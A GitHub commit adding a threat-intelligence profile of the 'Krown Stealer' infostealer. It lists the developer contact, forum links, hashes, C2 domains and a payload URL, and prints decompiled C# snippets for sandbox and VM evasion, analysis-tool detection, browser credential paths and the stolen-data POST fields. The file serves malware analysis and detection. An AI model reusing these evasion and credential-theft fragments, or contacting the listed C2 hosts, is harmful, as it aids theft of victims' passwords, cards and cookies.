-
Notifications
You must be signed in to change notification settings - Fork 24
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
cd0bd78
commit 6d3163a
Showing
1 changed file
with
246 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,246 @@ | ||
# Krown Stealer | ||
|
||
## Developer: | ||
https://t.me/expl01t_z | ||
|
||
## Deepweb forums: | ||
``` | ||
https://skynetzone.org/threads/krown-stealer-tvoj-vybor-na-rynke.14703/ | ||
https://xakerpro.ru/topic/10355/ | ||
https://teletype.in/@exploit_dar/rJcbPLamB | ||
https://teletype.in/@exploit_dar/rkQLnoAFH | ||
``` | ||
|
||
## Hashes | ||
30485e32f095374168c12454fea8c8175c9233a6a800f1985f702e04ed2630f5 | ||
fa4204a84e4ccc0a3b4603e053dacf4f0d153844f8bcf2af597c35962eb9ffb6 | ||
a0430d8c9fea6603ef8a512542e3c8863aa67c594bf09b718c29d630006a03a5 | ||
3a666cdb9d44450daf89c27fdf11e9a35a075cb92e77b45f2fd13481debdac4d | ||
b43af2361cfffe0046c94f566487b5de16b958a3da8bfcc20e789c42cdd5fecc | ||
8b208fd67c36ecaa43988049edcf136f6cd8b86423a8d158c9929aca8da049d9 | ||
dc453a73c59e9cd4cad5c6f80b3d0835fb48b61e8599b64287b375e0a484b3b0 | ||
34b0d0fef7ce3b70e8cdaaaf78273ec834b461897dda4c7c5a31a689e2a218f5 | ||
1bb68089b70a2e1de747550da79010fd0594ff368678c04a0e9496b5b31a7f6e | ||
29ec8a562965da7e029a785a784f8ee4e530e1ea62f01e321430aa16264a8815 | ||
db6c38e55ef827e159d8ba5b0030520ea081e0f47deab544ac2e0fa163a8bf65 | ||
cc83bf122b4e8be42a8d35d264d7768d218211b197bb54293c26a7b237bfda82 | ||
db783c3c806e08298d907f39fdc6bcd846821c4d702c6a4c96459631f2b2bb38 | ||
fc1e2e7cfbded57dc58e3469fdda8f52737d1853b432f83b9acc92f723373eda | ||
|
||
## C2 servers: | ||
``` | ||
185.228.232.72 | ||
a0362255.xsph.ru | ||
deathgame.net | ||
exporhub.pp.ua | ||
gamefpsbuster.ru | ||
h143466.s22.test-hf.su | ||
``` | ||
|
||
## C2 response: | ||
``` | ||
1,1,1,1,1,1,1,1,.cs:.log:.txt:.doc:.docx:.cpp:.sql,1001,1,https://h143466.s22.test-hf.su//update//svupdate.exe,1 | ||
``` | ||
|
||
## C2 resources: | ||
``` | ||
apps/ | ||
config.php | ||
assets/ | ||
auth.php | ||
BD.sql | ||
converter.php | ||
dashboard.php | ||
footer.template | ||
gate.php | ||
header.template | ||
index.php | ||
logout.php | ||
presets.php | ||
profiles.php | ||
search.php | ||
settings.php | ||
users.php | ||
viewer.php | ||
``` | ||
|
||
## ITW names: | ||
``` | ||
D1onis.exe | ||
``` | ||
|
||
## Internet check-in: | ||
``` | ||
ip.42.pl/raw | ||
``` | ||
|
||
## Mutex: | ||
``` | ||
\AppData\Local\Temp\admin.krown | ||
``` | ||
|
||
## RC4 key: | ||
``` | ||
private static int key = 666; | ||
``` | ||
|
||
## Source code: | ||
### Mutex: | ||
``` | ||
public static void MutexCheck() | ||
{ | ||
try | ||
{ | ||
if (File.Exists(Dirs.Temp + "\\" + Environment.UserName + ".krown")) | ||
{ | ||
Helpers.Suicide(); | ||
Environment.Exit(0); | ||
} | ||
else | ||
{ | ||
File.Create(Dirs.Temp + "\\" + Environment.UserName + ".krown"); | ||
} | ||
} | ||
catch | ||
{ | ||
} | ||
} | ||
``` | ||
|
||
### Country blacklist: | ||
``` | ||
Dirs.BlackList = new string[] | ||
{ | ||
"ru", | ||
"uk", | ||
"be", | ||
"kz", | ||
"ka", | ||
"ky", | ||
"uz" | ||
}; | ||
``` | ||
|
||
### Hardcoded supported browsers: | ||
``` | ||
Dirs.BrowsCC = new string[] | ||
{ | ||
Dirs.LocalAppData + "\\Google\\Chrome\\User Data\\Default\\" + Dirs.WebData, | ||
Dirs.AppData + "\\Opera Software\\Opera Stable\\" + Dirs.WebData, | ||
Dirs.LocalAppData + "\\Kometa\\User Data\\Default\\" + Dirs.WebData, | ||
Dirs.LocalAppData + "\\Orbitum\\User Data\\Default\\" + Dirs.WebData, | ||
Dirs.LocalAppData + "\\Comodo\\Dragon\\User Data\\Default\\" + Dirs.WebData, | ||
Dirs.LocalAppData + "\\Amigo\\User\\User Data\\Default\\" + Dirs.WebData, | ||
Dirs.LocalAppData + "\\Torch\\User Data\\Default\\" + Dirs.WebData, | ||
Dirs.LocalAppData + "\\CentBrowser\\User Data\\Default\\" + Dirs.WebData, | ||
Dirs.LocalAppData + "\\Go!\\User Data\\Default\\" + Dirs.WebData, | ||
Dirs.LocalAppData + "\\uCozMedia\\Uran\\User Data\\Default\\" + Dirs.WebData, | ||
Dirs.LocalAppData + "\\MapleStudio\\ChromePlus\\User Data\\Default\\" + Dirs.WebData, | ||
Dirs.LocalAppData + "\\Yandex\\YandexBrowser\\User Data\\Default\\" + Dirs.WebData, | ||
Dirs.LocalAppData + "\\BlackHawk\\User Data\\Default\\" + Dirs.WebData, | ||
Dirs.LocalAppData + "\\AcWebBrowser\\User Data\\Default\\" + Dirs.WebData, | ||
Dirs.LocalAppData + "\\CoolNovo\\User Data\\Default\\" + Dirs.WebData, | ||
Dirs.LocalAppData + "\\Epic Browser\\User Data\\Default\\" + Dirs.WebData, | ||
Dirs.LocalAppData + "\\Baidu Spark\\User Data\\Default\\" + Dirs.WebData, | ||
Dirs.LocalAppData + "\\Rockmelt\\User Data\\Default\\" + Dirs.WebData, | ||
Dirs.LocalAppData + "\\Sleipnir\\User Data\\Default\\" + Dirs.WebData, | ||
Dirs.LocalAppData + "\\SRWare Iron\\User Data\\Default\\" + Dirs.WebData, | ||
Dirs.LocalAppData + "\\Titan Browser\\User Data\\Default\\" + Dirs.WebData, | ||
Dirs.LocalAppData + "\\Flock\\User Data\\Default\\" + Dirs.WebData, | ||
Dirs.LocalAppData + "\\Vivaldi\\User Data\\Default\\" + Dirs.WebData, | ||
Dirs.LocalAppData + "\\Sputnik\\User Data\\Default\\" + Dirs.WebData, | ||
Dirs.LocalAppData + "\\Maxthon\\User Data\\Default\\" + Dirs.WebData | ||
}; | ||
``` | ||
|
||
``` | ||
public static string[] Processes = new string[] | ||
{ | ||
"HttpAnalyzer", | ||
"Dumper", | ||
"Reflector", | ||
"Wireshark", | ||
"WPE", | ||
"ProcessExplorer", | ||
"IDA", | ||
"HTTP Debugger Pro", | ||
"The Wireshark Network Analyzer", | ||
"WinDbg", | ||
"Colasoft Capsa", | ||
"smsniff", | ||
"Olly", | ||
"OllyDbg", | ||
"WPE PRO", | ||
"Microsoft Network Monitor", | ||
"Fiddler", | ||
"SmartSniff", | ||
"Immunity Debugger", | ||
"Process Explorer", | ||
"PE Tools", | ||
"AQtime", | ||
"DS-5 Debug", | ||
"Dbxtool", | ||
"Topaz", | ||
"FusionDebug", | ||
"NetBeans", | ||
"Rational Purify", | ||
".NET Reflector", | ||
"Cheat Engine", | ||
"Sigma Engine" | ||
}; | ||
``` | ||
|
||
## Anti-VM: | ||
``` | ||
public static void SandboxieDetect() | ||
{ | ||
if (AntiAnalyses.GetModuleHandle("SbieDll.dll").ToInt32() != 0) | ||
{ | ||
Environment.Exit(0); | ||
} | ||
} | ||
``` | ||
|
||
``` | ||
public static void VMDetect() | ||
{ | ||
using (ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher("Select * from Win32_ComputerSystem")) | ||
{ | ||
using (ManagementObjectCollection managementObjectCollection = managementObjectSearcher.Get()) | ||
{ | ||
foreach (ManagementBaseObject managementBaseObject in managementObjectCollection) | ||
{ | ||
string text = managementBaseObject["Manufacturer"].ToString().ToLower(); | ||
if ((text == "microsoft corporation" && managementBaseObject["Model"].ToString().ToUpperInvariant().Contains("VIRTUAL")) || text.Contains("vmware") || managementBaseObject["Model"].ToString() == "VirtualBox") | ||
{ | ||
Environment.Exit(0); | ||
} | ||
} | ||
} | ||
} | ||
} | ||
``` | ||
|
||
## C2 POST data: | ||
``` | ||
Post_File.name.Add("hwid", hwid); | ||
Post_File.name.Add("os", value2); | ||
Post_File.name.Add("platform", value); | ||
Post_File.name.Add("profile", value3); | ||
Post_File.name.Add("user", Environment.UserName); | ||
Post_File.name.Add("passwordsCount", value4); | ||
Post_File.name.Add("cccount", value5); | ||
Post_File.name.Add("ccount", value9); | ||
Post_File.name.Add("fcount", "null"); | ||
Post_File.name.Add("telegram", value6); | ||
Post_File.name.Add("cookies", value7); | ||
Post_File.name.Add("steam", value8); | ||
``` | ||
|
||
## Encryption: | ||
``` | ||
string target = "ʰʷˉ˞˜ʷ˩˾ʰ˼ʷʰ˞ˉ˜ʷʰʷʷ˼ʰʷ˜ʰʷ˜ʰ˒ʷ˜ʰʰʰʨʷʰʷʰʷʰʨʷʰʷʰ˿˜˾˩˼ˣ˯˳˃˞˜ˏ˓˃˯˳˼ˣʩʩʩʷʷʷʷ"; | ||
byte[] data = Program.StringToByteArray("687474703a2f2f646561746867616d652e6e65742f676174652e706870"); | ||
byte[] bytes = Encoding.Default.GetBytes(Encrypt.XOR(target)); | ||
string @string = Encoding.Default.GetString(Encrypt.Encrypt_RC4(bytes, data)); | ||
``` |